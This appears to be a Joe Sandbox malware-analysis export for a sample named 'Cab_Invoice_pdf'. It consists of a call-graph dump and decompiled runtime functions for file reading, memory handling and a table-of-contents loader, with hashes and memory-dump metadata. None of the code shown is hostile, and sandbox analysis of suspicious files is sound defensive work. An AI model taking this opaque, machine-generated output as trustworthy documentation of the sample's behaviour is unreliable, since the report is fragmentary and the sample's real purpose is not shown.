17204->17205 17229 132b83d 17204->17229 17206 131d7e9 __wsopen_s 26 API calls 17205->17206 17209 132b865 17205->17209 17209->17229 17229->17131 17229->17132 17232 132ba9b 17231->17232 17233 132bab6 17232->17233 17234 131c9ce _free 20 API calls 17232->17234 17233->17154 17235 132bada 17234->17235 17236 1321788 pre_c_initialization 26 API calls 17235->17236 17237 132bae5 17236->17237 17237->17154 17239 131d7f5 17238->17239 17240 131d80a 17238->17240 17241 131c9ce _free 20 API calls 17239->17241 17240->17158 17242 131d7fa 17241->17242 17243 1321788 pre_c_initialization 26 API calls 17242->17243 17244 131d805 17243->17244 17244->17158 17245->17170 17257 1326046 LeaveCriticalSection 17246->17257 17248 131e893 17248->17173 17250 1320b10 _free 20 API calls 17249->17250 17252 131e574 17250->17252 17251 13209eb _free 20 API calls 17253 131e5d3 17251->17253 17254 132391e __wsopen_s 11 API calls 17252->17254 17255 131e581 17252->17255 17253->17168 17256 131e6a9 EnterCriticalSection 17253->17256 17254->17252 17255->17251 17256->17168 17257->17248 17298->17146 19430 131fa8a 19431 131faac 19430->19431 19433 131fa93 19430->19433 19432 131fa9b 19433->19432 19437 131fb12 19433->19437 19435 131faa3 19435->19432 19448 131fddf 19435->19448 19438 131fb1b 19437->19438 19439 131fb1e 19437->19439 19438->19435 19458 1327ce3 GetEnvironmentStringsW 19439->19458 19442 131fb2b 19444 13209eb _free 20 API calls 19442->19444 19445 131fb60 19444->19445 19445->19435 19446 131fb36 19447 13209eb _free 20 API calls 19446->19447 19447->19442 19449 131fdec 19448->19449 19455 131fdf1 19448->19455 19449->19431 19450 131fdf7 MultiByteToWideChar 19450->19455 19456 131fe46 19450->19456 19451 1320b10 _free 20 API calls 19451->19455 19452 131fe1b MultiByteToWideChar 19453 131fe4c 19452->19453 19452->19455 19454 13209eb _free 20 API calls 19453->19454 19454->19456 19455->19450 19455->19451 19455->19452 19455->19453 19455->19456 19457 13209eb _free 20 API calls 19455->19457 19456->19431 19457->19455 19459 
1327cf7 19458->19459 19460 131fb25 19458->19460 19461 1320a25 __fread_nolock 21 API calls 19459->19461 19460->19442 19465 131fc37 19460->19465 19462 1327d0b __fread_nolock 19461->19462 19463 13209eb _free 20 API calls 19462->19463 19464 1327d25 FreeEnvironmentStringsW 19463->19464 19464->19460 19467 131fc55 19465->19467 19466 1320b10 _free 20 API calls 19476 131fc8f 19466->19476 19467->19466 19468 13209eb _free 20 API calls 19469 131fd1a 19468->19469 19469->19446 19470 1320b10 _free 20 API calls 19470->19476 19471 131fd02 19491 131fd31 19471->19491 19475 13209eb _free 20 API calls 19478 131fd00 19475->19478 19476->19470 19476->19471 19477 131fd24 19476->19477 19476->19478 19480 13209eb _free 20 API calls 19476->19480 19482 132618c 19476->19482 19479 1321798 __wsopen_s 11 API calls 19477->19479 19478->19468 19481 131fd30 19479->19481 19480->19476 19483 1326199 19482->19483 19484 13261a7 19482->19484 19483->19484 19489 13261c0 19483->19489 19485 131c9ce _free 20 API calls 19484->19485 19486 13261b1 19485->19486 19487 1321788 pre_c_initialization 26 API calls 19486->19487 19488 13261bb 19487->19488 19488->19476 19489->19488 19490 131c9ce _free 20 API calls 19489->19490 19490->19486 19492 131fd08 19491->19492 19493 131fd3e 19491->19493 19492->19475 19494 131fd55 19493->19494 19495 13209eb _free 20 API calls 19493->19495 19496 13209eb _free 20 API calls 19494->19496 19495->19493 19496->19492 20463 132548c 20464 1325642 20463->20464 20466 13254b6 20463->20466 20465 131c9ce _free 20 API calls 20464->20465 20483 132562d 20465->20483 20466->20464 20469 1325513 20466->20469 20467 131786a _ValidateLocalCookies 5 API calls 20468 132565f 20467->20468 20484 132b3ce 20469->20484 20471 1325533 20492 132ac02 20471->20492 20473 1325547 20474 1325663 20473->20474 20499 132ac2e 20473->20499 20475 1321798 __wsopen_s 11 API calls 20474->20475 20477 132566d 20475->20477 20478 1325559 20478->20474 20506 132ac5a 20478->20506 20480 132556b 20480->20474 20481 1325574 20480->20481 
20481->20483 20513 132b41f 20481->20513 20483->20467 20485 132b3da ___scrt_is_nonwritable_in_current_image 20484->20485 20486 132b410 ___scrt_is_nonwritable_in_current_image 20485->20486 20521 1325ffe EnterCriticalSection 20485->20521 20486->20471 20488 132b3ea 20491 132b3fd 20488->20491 20522 132b2ee 20488->20522 20540 132b416 20491->20540 20493 132ac23 20492->20493 20494 132ac0e 20492->20494 20493->20473 20495 131c9ce _free 20 API calls 20494->20495 20496 132ac13 20495->20496 20497 1321788 pre_c_initialization 26 API calls 20496->20497 20498 132ac1e 20497->20498 20498->20473 20500 132ac3a 20499->20500 20501 132ac4f 20499->20501 20502 131c9ce _free 20 API calls 20500->20502 20501->20478 20503 132ac3f 20502->20503 20504 1321788 pre_c_initialization 26 API calls 20503->20504 20505 132ac4a 20504->20505 20505->20478 20507 132ac66 20506->20507 20508 132ac7b 20506->20508 20509 131c9ce _free 20 API calls 20507->20509 20508->20480 20510 132ac6b 20509->20510 20511 1321788 pre_c_initialization 26 API calls 20510->20511 20512 132ac76 20511->20512 20512->20480 20514 132b42b ___scrt_is_nonwritable_in_current_image 20513->20514 20650 1325ffe EnterCriticalSection 20514->20650 20516 132b436 20651 132ac86 20516->20651 20520 132b455 ___scrt_is_nonwritable_in_current_image 20520->20483 20521->20488 20524 132b33a 20522->20524 20523 132b341 20526 132b3b1 20523->20526 20527 132b3a8 20523->20527 20524->20523 20525 1320a25 __fread_nolock 21 API calls 20524->20525 20531 132b359 20525->20531 20604 132b193 20526->20604 20543 132afbe 20527->20543 20530 132b360 20534 13209eb _free 20 API calls 20530->20534 20531->20530 20537 132b386 20531->20537 20532 132b3ae 20533 13209eb _free 20 API calls 20532->20533 20535 132b3bc 20533->20535 20534->20523 20536 131786a _ValidateLocalCookies 5 API calls 20535->20536 20538 132b3ca 20536->20538 20539 13209eb _free 20 API calls 20537->20539 20538->20491 20539->20523 20649 1326046 LeaveCriticalSection 20540->20649 20542 132b41d 20542->20486 20544 132afcd 
20543->20544 20545 132ac5a 26 API calls 20544->20545 20546 132afe3 20545->20546 20547 132ac02 26 API calls 20546->20547 20601 132b15d 20546->20601 20550 132aff5 20547->20550 20548 1321798 __wsopen_s 11 API calls 20551 132b192 20548->20551 20549 13209eb _free 20 API calls 20553 132b045 20549->20553 20550->20549 20556 132b166 20550->20556 20550->20601 20552 132ac5a 26 API calls 20551->20552 20554 132b1b8 20552->20554 20559 1320a25 __fread_nolock 21 API calls 20553->20559 20555 132b2e3 20554->20555 20558 132ac02 26 API calls 20554->20558 20557 1321798 __wsopen_s 11 API calls 20555->20557 20556->20532 20564 132b2ed 20557->20564 20560 132b1ca 20558->20560 20561 132b05d 20559->20561 20560->20555 20563 132ac2e 26 API calls 20560->20563 20562 13209eb _free 20 API calls 20561->20562 20569 132b069 20562->20569 20565 132b1dc 20563->20565 20566 132b341 20564->20566 20570 1320a25 __fread_nolock 21 API calls 20564->20570 20565->20555 20567 132b1e5 20565->20567 20571 132b3b1 20566->20571 20576 132b3a8 20566->20576 20568 13209eb _free 20 API calls 20567->20568 20572 132b1f0 GetTimeZoneInformation 20568->20572 20569->20556 20573 1320a73 26 API calls 20569->20573 20575 132b359 20570->20575 20578 132b193 45 API calls 20571->20578 20577 132b20c 20572->20577 20596 132b2ad 20572->20596 20574 132b093 20573->20574 20581 13250a9 26 API calls 20574->20581 20574->20601 20588 132b360 20575->20588 20589 132b386 20575->20589 20579 132afbe 45 API calls 20576->20579 20644 1327d59 20577->20644 20580 132b3ae 20578->20580 20579->20580 20582 13209eb _free 20 API calls 20580->20582 20587 132b0ac 20581->20587 20584 132b3bc 20582->20584 20583 13209eb _free 20 API calls 20583->20566 20585 131786a _ValidateLocalCookies 5 API calls 20584->20585 20590 132b3ca 20585->20590 20587->20601 20640 1321594 20587->20640 20588->20583 20592 13209eb _free 20 API calls 20589->20592 20590->20532 20592->20566 20593 132b27f WideCharToMultiByte 20593->20596 20596->20532 20598 132b120 20598->20556 20600 13250a9 26 API calls 
20598->20600 20599 1321594 42 API calls 20602 132b0fb 20599->20602 20600->20601 20601->20548 20601->20556 20602->20598 20603 1321594 42 API calls 20602->20603 20603->20598 20605 132b1a2 20604->20605 20606 132ac5a 26 API calls 20605->20606 20607 132b1b8 20606->20607 20608 132b2e3 20607->20608 20610 132ac02 26 API calls 20607->20610 20609 1321798 __wsopen_s 11 API calls 20608->20609 20613 132b2ed 20609->20613 20611 132b1ca 20610->20611 20611->20608 20612 132ac2e 26 API calls 20611->20612 20614 132b1dc 20612->20614 20615 132b341 20613->20615 20618 1320a25 __fread_nolock 21 API calls 20613->20618 20614->20608 20616 132b1e5 20614->20616 20619 132b3b1 20615->20619 20622 132b3a8 20615->20622 20617 13209eb _free 20 API calls 20616->20617 20620 132b1f0 GetTimeZoneInformation 20617->20620 20621 132b359 20618->20621 20624 132b193 45 API calls 20619->20624 20623 132b20c 20620->20623 20634 132b2ad 20620->20634 20632 132b360 20621->20632 20633 132b386 20621->20633 20625 132afbe 45 API calls 20622->20625 20631 1327d59 38 API calls 20623->20631 20626 132b3ae 20624->20626 20625->20626 20627 13209eb _free 20 API calls 20626->20627 20629 132b3bc 20627->20629 20628 13209eb _free 20 API calls 20628->20615 20630 131786a _ValidateLocalCookies 5 API calls 20629->20630 20635 132b3ca 20630->20635 20636 132b261 WideCharToMultiByte 20631->20636 20632->20628 20637 13209eb _free 20 API calls 20633->20637 20634->20532 20635->20532 20638 132b27f WideCharToMultiByte 20636->20638 20637->20615 20638->20634 20641 13215ad 20640->20641 20642 1320bbb 42 API calls 20641->20642 20643 13215b7 20642->20643 20643->20598 20643->20599 20645 1324425 pre_c_initialization 38 API calls 20644->20645 20646 1327d64 20645->20646 20647 1324574 __cftof 38 API calls 20646->20647 20648 1327d74 WideCharToMultiByte 20647->20648 20648->20593 20649->20542 20650->20516 20652 132ac02 26 API calls 20651->20652 20653 132ac9b 20652->20653 20654 132ae62 20653->20654 20655 132aca4 20653->20655 20656 1321798 __wsopen_s 11 API calls 
20654->20656 20658 132ada4 20655->20658 20659 132acd8 20655->20659 20661 132ad9f 20655->20661 20657 132ae6c 20656->20657 20660 132ae6d 26 API calls 20658->20660 20670 132ae6d 20659->20670 20662 132add9 20660->20662 20667 132b460 20661->20667 20665 132ae6d 26 API calls 20662->20665 20665->20661 20666 132ae6d 26 API calls 20666->20661 20677 1326046 LeaveCriticalSection 20667->20677 20669 132b467 20669->20520 20673 132ae83 20670->20673 20671 132ad38 20671->20666 20672 132ac2e 26 API calls 20674 132af64 20672->20674 20673->20671 20673->20672 20674->20671 20675 1321798 __wsopen_s 11 API calls 20674->20675 20676 132afbc 20675->20676 20677->20669 20847 131a7fb 20857 131dade 20847->20857 20851 131a808 20852 1321aed 20 API calls 20851->20852 20853 131a817 DeleteCriticalSection 20852->20853 20853->20851 20854 131a832 20853->20854 20855 13209eb _free 20 API calls 20854->20855 20856 131a83d 20855->20856 20858 131dae7 66 API calls 20857->20858 20859 131a803 20858->20859 20860 1323b47 20859->20860 20861 1323b53 ___scrt_is_nonwritable_in_current_image 20860->20861 20870 1325ffe EnterCriticalSection 20861->20870 20863 1323b5e 20864 1323bc9 20863->20864 20866 1323b9d DeleteCriticalSection 20863->20866 20868 1319889 67 API calls 20863->20868 20871 1323bde 20864->20871 20869 13209eb _free 20 API calls 20866->20869 20867 1323bd5 ___scrt_is_nonwritable_in_current_image 20867->20851 20868->20863 20869->20863 20870->20863 20874 1326046 LeaveCriticalSection 20871->20874 20873 1323be5 20873->20867 20874->20873 15954 1311560 15955 1311578 15954->15955 15956 131156a 15954->15956 15973 131160d 15955->15973 15986 1311120 15955->15986 16032 13128c0 15956->16032 15959 131158b 15962 131159e 15959->15962 16004 1319f16 15959->16004 16007 13113d0 15962->16007 15963 13115af 15964 13115b7 htonl htonl 15963->15964 15963->15973 15965 1319f16 64 API calls 15964->15965 15966 13115e3 htonl 15965->15966 15967 13115f4 15966->15967 15968 1311615 htonl 15967->15968 15969 13115fe 15967->15969 16018 1319b2b 
15968->16018 16041 13117b0 15969->16041 15974 1311632 15976 13117b0 59 API calls 15974->15976 15975 1311649 htonl 16021 1319934 15975->16021 15978 1311641 15976->15978 15979 131165e 15980 1311665 15979->15980 15981 1311677 15979->15981 16055 1311910 15980->16055 16028 1311200 15981->16028 15987 1319f16 64 API calls 15986->15987 15988 1311139 15987->15988 15989 1319b2b __fread_nolock 40 API calls 15988->15989 15990 1311149 15989->15990 15991 13111f2 15990->15991 15992 1319f16 64 API calls 15990->15992 15991->15959 15993 131116d 15992->15993 15994 1319b2b __fread_nolock 40 API calls 15993->15994 15995 131117d 15994->15995 15996 1319f16 64 API calls 15995->15996 15997 131118e 15996->15997 15998 1319b2b __fread_nolock 40 API calls 15997->15998 15999 131119e 15998->15999 15999->15991 16000 1319f16 64 API calls 15999->16000 16001 13111d0 16000->16001 16002 1319b2b __fread_nolock 40 API calls 16001->16002 16003 13111e0 16002->16003 16003->15959 16063 1319cdd 16004->16063 16006 1319f2c 16006->15962 16008 1319f16 64 API calls 16007->16008 16009 13113fa 16008->16009 16010 131143d 16009->16010 16012 1319b2b __fread_nolock 40 API calls 16009->16012 16011 131786a _ValidateLocalCookies 5 API calls 16010->16011 16013 131144e 16011->16013 16014 1311411 16012->16014 16013->15963 16014->16010 16015 1311452 htonl 16014->16015 16016 131786a _ValidateLocalCookies 5 API calls 16015->16016 16017 13114ab 16016->16017 16017->15963 16327 1319b48 16018->16327 16020 131162a 16020->15974 16020->15975 16022 1319940 16021->16022 16023 1319954 16021->16023 16024 131c9ce _free 20 API calls 16022->16024 16023->15979 16025 1319945 16024->16025 16026 1321788 pre_c_initialization 26 API calls 16025->16026 16027 1319950 16026->16027 16027->15979 16029 131120b 16028->16029 16030 1311211 16028->16030 16466 1319889 16029->16466 16562 1314bf0 16032->16562 16034 13128f3 16035 1314bf0 59 API calls 16034->16035 16036 1312900 16035->16036 16577 131d62f 16036->16577 16039 131786a _ValidateLocalCookies 5 API 
calls 16040 1312921 16039->16040 16040->15955 16042 13117ec ___scrt_initialize_default_local_stdio_options 16041->16042 16043 131c90d 50 API calls 16042->16043 16044 13117fa 16043->16044 16045 131c9ce _free 20 API calls 16044->16045 16046 13117ff 16045->16046 17029 131ca5d 16046->17029 16049 1311ac0 50 API calls 16050 1311824 16049->16050 16051 13119f0 59 API calls 16050->16051 16052 1311838 16051->16052 16053 131786a _ValidateLocalCookies 5 API calls 16052->16053 16054 131184a 16053->16054 16054->15973 16056 1311944 ___scrt_initialize_default_local_stdio_options 16055->16056 16057 131c90d 50 API calls 16056->16057 16058 1311952 16057->16058 16059 13119f0 59 API calls 16058->16059 16060 1311963 16059->16060 16061 131786a _ValidateLocalCookies 5 API calls 16060->16061 16062 131166f 16061->16062 16064 1319ce9 ___scrt_is_nonwritable_in_current_image 16063->16064 16065 1319cf5 16064->16065 16067 1319d1b 16064->16067 16066 131c9ce _free 20 API calls 16065->16066 16069 1319cfa 16066->16069 16076 131a847 EnterCriticalSection 16067->16076 16071 1321788 pre_c_initialization 26 API calls 16069->16071 16070 1319d27 16077 1319e3d 16070->16077 16075 1319d05 ___scrt_is_nonwritable_in_current_image 16071->16075 16073 1319d3b 16088 1319d5a 16073->16088 16075->16006 16076->16070 16078 1319e5f 16077->16078 16079 1319e4f 16077->16079 16091 1319d64 16078->16091 16080 131c9ce _free 20 API calls 16079->16080 16082 1319e54 16080->16082 16082->16073 16083 1319e82 16087 1319f01 16083->16087 16095 131da31 16083->16095 16087->16073 16326 131a85b LeaveCriticalSection 16088->16326 16090 1319d62 16090->16075 16092 1319d70 16091->16092 16093 1319d77 16091->16093 16092->16083 16093->16092 16094 1322807 __fread_nolock 28 API calls 16093->16094 16094->16092 16096 131da49 16095->16096 16100 1319ea9 16095->16100 16097 13209c5 __fread_nolock 26 API calls 16096->16097 16096->16100 16098 131da69 16097->16098 16104 1322fa0 16098->16104 16101 1322807 16100->16101 16102 132276e __fread_nolock 28 API calls 
16101->16102 16103 132281d 16102->16103 16103->16087 16105 1322fac ___scrt_is_nonwritable_in_current_image 16104->16105 16106 1322fb4 16105->16106 16107 1322fcc 16105->16107 16108 131c9bb __dosmaperr 20 API calls 16106->16108 16109 132306a 16107->16109 16113 1323001 16107->16113 16110 1322fb9 16108->16110 16111 131c9bb __dosmaperr 20 API calls 16109->16111 16112 131c9ce _free 20 API calls 16110->16112 16114 132306f 16111->16114 16124 1322fc1 ___scrt_is_nonwritable_in_current_image 16112->16124 16129 131e6a9 EnterCriticalSection 16113->16129 16116 131c9ce _free 20 API calls 16114->16116 16118 1323077 16116->16118 16117 1323007 16119 1323023 16117->16119 16120 1323038 16117->16120 16121 1321788 pre_c_initialization 26 API calls 16118->16121 16123 131c9ce _free 20 API calls 16119->16123 16130 132308b 16120->16130 16121->16124 16126 1323028 16123->16126 16124->16100 16125 1323033 16183 1323062 16125->16183 16127 131c9bb __dosmaperr 20 API calls 16126->16127 16127->16125 16129->16117 16131 13230b9 16130->16131 16169 13230b2 16130->16169 16132 13230bd 16131->16132 16134 13230dc 16131->16134 16133 131c9bb __dosmaperr 20 API calls 16132->16133 16136 13230c2 16133->16136 16137 132312d 16134->16137 16138 1323110 16134->16138 16135 131786a _ValidateLocalCookies 5 API calls 16139 1323293 16135->16139 16140 131c9ce _free 20 API calls 16136->16140 16141 1323143 16137->16141 16145 1322807 __fread_nolock 28 API calls 16137->16145 16142 131c9bb __dosmaperr 20 API calls 16138->16142 16139->16125 16144 13230c9 16140->16144 16186 1322c30 16141->16186 16143 1323115 16142->16143 16147 131c9ce _free 20 API calls 16143->16147 16148 1321788 pre_c_initialization 26 API calls 16144->16148 16145->16141 16150 132311d 16147->16150 16148->16169 16153 1321788 pre_c_initialization 26 API calls 16150->16153 16153->16169 16169->16135 16325 131e760 LeaveCriticalSection 16183->16325 16185 1323068 16185->16124 16231 1328d71 16186->16231 16188 1322c40 16232 1328d8b 16231->16232 16233 1328d7e 
16231->16233 16235 131c9ce _free 20 API calls 16232->16235 16237 1328d97 16232->16237 16234 131c9ce _free 20 API calls 16233->16234 16236 1328d83 16234->16236 16238 1328db8 16235->16238 16236->16188 16237->16188 16325->16185 16326->16090 16328 1319b54 ___scrt_is_nonwritable_in_current_image 16327->16328 16329 1319b94 16328->16329 16330 1319b67 ___scrt_get_show_window_mode 16328->16330 16331 1319b8c ___scrt_is_nonwritable_in_current_image 16328->16331 16340 131a847 EnterCriticalSection 16329->16340 16334 131c9ce _free 20 API calls 16330->16334 16331->16020 16333 1319b9e 16341 131995f 16333->16341 16336 1319b81 16334->16336 16338 1321788 pre_c_initialization 26 API calls 16336->16338 16338->16331 16340->16333 16345 1319971 ___scrt_get_show_window_mode 16341->16345 16347 131998e 16341->16347 16342 131997e 16343 131c9ce _free 20 API calls 16342->16343 16344 1319983 16343->16344 16346 1321788 pre_c_initialization 26 API calls 16344->16346 16345->16342 16345->16347 16349 13199d1 __fread_nolock 16345->16349 16346->16347 16354 1319bd3 16347->16354 16348 1319aed ___scrt_get_show_window_mode 16352 131c9ce _free 20 API calls 16348->16352 16349->16347 16349->16348 16351 13209c5 __fread_nolock 26 API calls 16349->16351 16357 1322128 16349->16357 16422 1319bdb 16349->16422 16351->16349 16352->16344 16465 131a85b LeaveCriticalSection 16354->16465 16356 1319bd9 16356->16331 16358 1322152 16357->16358 16359 132213a 16357->16359 16360 13224bc 16358->16360 16364 1322197 16358->16364 16361 131c9bb __dosmaperr 20 API calls 16359->16361 16363 131c9bb __dosmaperr 20 API calls 16360->16363 16362 132213f 16361->16362 16365 131c9ce _free 20 API calls 16362->16365 16366 13224c1 16363->16366 16368 13221a2 16364->16368 16369 1322147 16364->16369 16375 13221d2 16364->16375 16365->16369 16367 131c9ce _free 20 API calls 16366->16367 16370 13221af 16367->16370 16371 131c9bb __dosmaperr 20 API calls 16368->16371 16369->16349 16373 1321788 pre_c_initialization 26 API calls 16370->16373 16372 13221a7 

                            Executed Functions

                            C-Code - Quality: 100%
                            			E0131825F() {
                            				_Unknown_base(*)()* _t1;
                            
                            				_t1 = SetUnhandledExceptionFilter(E0131826B); // executed
                            				return _t1;
                            			}




                            0x01318264
                            0x0131826a

                            APIs
                            • SetUnhandledExceptionFilter.KERNELBASE(Function_0000826B,0131795E), ref: 01318264
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: 8e6688297ab1819537b33f4752e2de60c751f08a361de62236530b887702b286
                            • Instruction ID: 070c1da1d6614b30086f5729c3996331334f4cd3c6b2161a74c5a1a15b60fd56
                            • Opcode Fuzzy Hash: 8e6688297ab1819537b33f4752e2de60c751f08a361de62236530b887702b286
                            • Instruction Fuzzy Hash:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 50%
                            			E01311560(void* __ecx, void* __edx, void* __ebp, signed int* _a4) {
                            				void* _t14;
                            				signed int _t15;
                            				void* _t18;
                            				signed int _t19;
                            				void* _t20;
                            				signed int _t26;
                            				signed int _t28;
                            				void* _t31;
                            				void* _t32;
                            				signed int* _t33;
                            				void* _t35;
                            				void* _t36;
                            
                            				_t32 = __edx;
                            				_t31 = __ecx;
                            				_t33 = _a4;
                            				if( *_t33 != 0) {
                            					L2:
                            					_t14 = E01311120(_t32, _t33);
                            					_t36 = _t35 + 4;
                            					_t48 = _t14 - 1;
                            					if(_t14 < 1) {
                            						E01319F16(_t32,  *_t33, 0, 2); // executed
                            						_t14 = E0131A488(_t32, _t48,  *_t33); // executed
                            						_t36 = _t36 + 0x10;
                            					}
                            					_t15 = E013113D0(_t32, _t33, _t14);
                            					if(_t15 == 0xffffffff) {
                            						goto L7;
                            					} else {
                            						_t3 =  &(_t33[9]); // 0x1
                            						_push( *_t3);
                            						_t33[0x101b] = 0;
                            						L01317864();
                            						_push(0);
                            						 *0x133c954 = _t15;
                            						_t5 =  &(_t33[7]); // 0xc0335f00
                            						L01317864();
                            						_t6 =  &(_t33[1]); // 0x1a74c085
                            						_t18 = E01319F16(_t32,  *_t33, _t15 +  *_t6,  *_t5); // executed
                            						_t7 =  &(_t33[8]); // 0xb85fc35b
                            						_push( *_t7);
                            						L01317864();
                            						_push(_t18); // executed
                            						_t19 = E01319808(_t31); // executed
                            						_t33[2] = _t19;
                            						_t50 = _t19;
                            						if(_t19 != 0) {
                            							_push( *_t33);
                            							_t9 =  &(_t33[8]); // 0xb85fc35b
                            							L01317864();
                            							_t10 =  &(_t33[2]); // 0xc085078b, executed
                            							_t20 = E01319B2B( *_t10, _t19,  *_t9, 1); // executed
                            							__eflags = _t20 - 1;
                            							if(__eflags >= 0) {
                            								_t11 =  &(_t33[8]); // 0xb85fc35b
                            								_push( *_t11);
                            								L01317864();
                            								_t12 =  &(_t33[2]); // 0xc085078b
                            								_t33[3] = _t20 +  *_t12;
                            								__eflags = E01319934( *_t33);
                            								if(__eflags == 0) {
                            									E01311200(_t33);
                            									__eflags = 0;
                            									return 0;
                            								} else {
                            									_push("Error on file\n.");
                            									_t26 = E01311910(__eflags) | 0xffffffff;
                            									__eflags = _t26;
                            									return _t26;
                            								}
                            							} else {
                            								_push("Could not read from file.");
                            								_push("fread");
                            								_t28 = E013117B0(__eflags) | 0xffffffff;
                            								__eflags = _t28;
                            								return _t28;
                            							}
                            						} else {
                            							_push("Could not allocate buffer for TOC.");
                            							_push("malloc");
                            							_t15 = E013117B0(_t50);
                            							goto L7;
                            						}
                            					}
                            				} else {
                            					_t2 =  &(_t33[0x1a]); // 0x131176c
                            					_t15 = E013128C0(_t2, "rb");
                            					_t35 = _t35 + 8;
                            					 *_t33 = _t15;
                            					if(_t15 == 0) {
                            						L7:
                            						return _t15 | 0xffffffff;
                            					} else {
                            						goto L2;
                            					}
                            				}
                            			}

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: htonl$__fread_nolock
                            • String ID: Could not allocate buffer for TOC.$Could not read from file.$Error on file.$fread$malloc
                            • API String ID: 3757756281-2332847760
                            • Opcode ID: b1e6da5404811f60937ae96a0ca691df1826db12bfc6411a4a220534ffcd1095
                            • Instruction ID: fd9acf414977476da447cc55108fdcd8394025dc1c065c84879d1fbc300c5adf
                            • Opcode Fuzzy Hash: b1e6da5404811f60937ae96a0ca691df1826db12bfc6411a4a220534ffcd1095
                            • Instruction Fuzzy Hash: 4B21FDB1840702B7DA293B3DEC01B9B7AD5AF2026DF080D28F9D9913A9F763D5508A55
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            C-Code - Quality: 77%
                            			E01322128(signed int _a4, void* _a8, unsigned int _a12) {
                            				signed int _v5;
                            				char _v6;
                            				void* _v12;
                            				unsigned int _v16;
                            				signed int _v20;
                            				signed int _v24;
                            				signed int _v28;
                            				void* _v32;
                            				long _v36;
                            				void* _v40;
                            				long _v44;
                            				signed int* _t143;
                            				signed int _t145;
                            				intOrPtr _t149;
                            				signed int _t153;
                            				signed int _t155;
                            				signed char _t157;
                            				unsigned int _t158;
                            				intOrPtr _t162;
                            				void* _t163;
                            				signed int _t164;
                            				signed int _t167;
                            				long _t168;
                            				intOrPtr _t175;
                            				signed int _t176;
                            				intOrPtr _t178;
                            				signed int _t180;
                            				signed int _t184;
                            				char _t191;
                            				char* _t192;
                            				char _t199;
                            				char* _t200;
                            				signed char _t211;
                            				signed int _t213;
                            				long _t215;
                            				signed int _t216;
                            				char _t218;
                            				signed char _t222;
                            				signed int _t223;
                            				unsigned int _t224;
                            				intOrPtr _t225;
                            				unsigned int _t229;
                            				intOrPtr _t231;
                            				signed int _t232;
                            				signed int _t233;
                            				signed int _t234;
                            				signed int _t235;
                            				signed char _t236;
                            				signed int _t237;
                            				signed int _t239;
                            				signed int _t240;
                            				signed int _t241;
                            				signed int _t242;
                            				signed int _t246;
                            				void* _t248;
                            				void* _t249;
                            
                            				_t213 = _a4;
                            				if(_t213 != 0xfffffffe) {
                            					__eflags = _t213;
                            					if(_t213 < 0) {
                            						L58:
                            						_t143 = E0131C9BB();
                            						 *_t143 =  *_t143 & 0x00000000;
                            						__eflags =  *_t143;
                            						 *((intOrPtr*)(E0131C9CE())) = 9;
                            						L59:
                            						_t145 = E01321788();
                            						goto L60;
                            					}
                            					__eflags = _t213 -  *0x1346308; // 0x40
                            					if(__eflags >= 0) {
                            						goto L58;
                            					}
                            					_v24 = 1;
                            					_t239 = _t213 >> 6;
                            					_t235 = (_t213 & 0x0000003f) * 0x30;
                            					_v20 = _t239;
                            					_t149 =  *((intOrPtr*)(0x1346108 + _t239 * 4));
                            					_v28 = _t235;
                            					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
                            					_v5 = _t222;
                            					__eflags = _t222 & 0x00000001;
                            					if((_t222 & 0x00000001) == 0) {
                            						goto L58;
                            					}
                            					_t223 = _a12;
                            					__eflags = _t223 - 0x7fffffff;
                            					if(_t223 <= 0x7fffffff) {
                            						__eflags = _t223;
                            						if(_t223 == 0) {
                            							L57:
                            							return 0;
                            						}
                            						__eflags = _v5 & 0x00000002;
                            						if((_v5 & 0x00000002) != 0) {
                            							goto L57;
                            						}
                            						__eflags = _a8;
                            						if(_a8 == 0) {
                            							goto L6;
                            						}
                            						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
                            						_v5 = _t153;
                            						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
                            						_t246 = 0;
                            						_t155 = _t153 - 1;
                            						__eflags = _t155;
                            						if(_t155 == 0) {
                            							_t236 = _v24;
                            							_t157 =  !_t223;
                            							__eflags = _t236 & _t157;
                            							if((_t236 & _t157) != 0) {
                            								_t158 = 4;
                            								_t224 = _t223 >> 1;
                            								_v16 = _t158;
                            								__eflags = _t224 - _t158;
                            								if(_t224 >= _t158) {
                            									_t158 = _t224;
                            									_v16 = _t224;
                            								}
                            								_t246 = E01320A25(_t224, _t158);
                            								E013209EB(0);
                            								E013209EB(0);
                            								_t249 = _t248 + 0xc;
                            								_v12 = _t246;
                            								__eflags = _t246;
                            								if(_t246 != 0) {
                            									_t162 = E01322807(_t213, 0, 0, _v24);
                            									_t225 =  *((intOrPtr*)(0x1346108 + _t239 * 4));
                            									_t248 = _t249 + 0x10;
                            									_t240 = _v28;
                            									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
                            									_t163 = _t246;
                            									 *(_t240 + _t225 + 0x24) = _t236;
                            									_t235 = _t240;
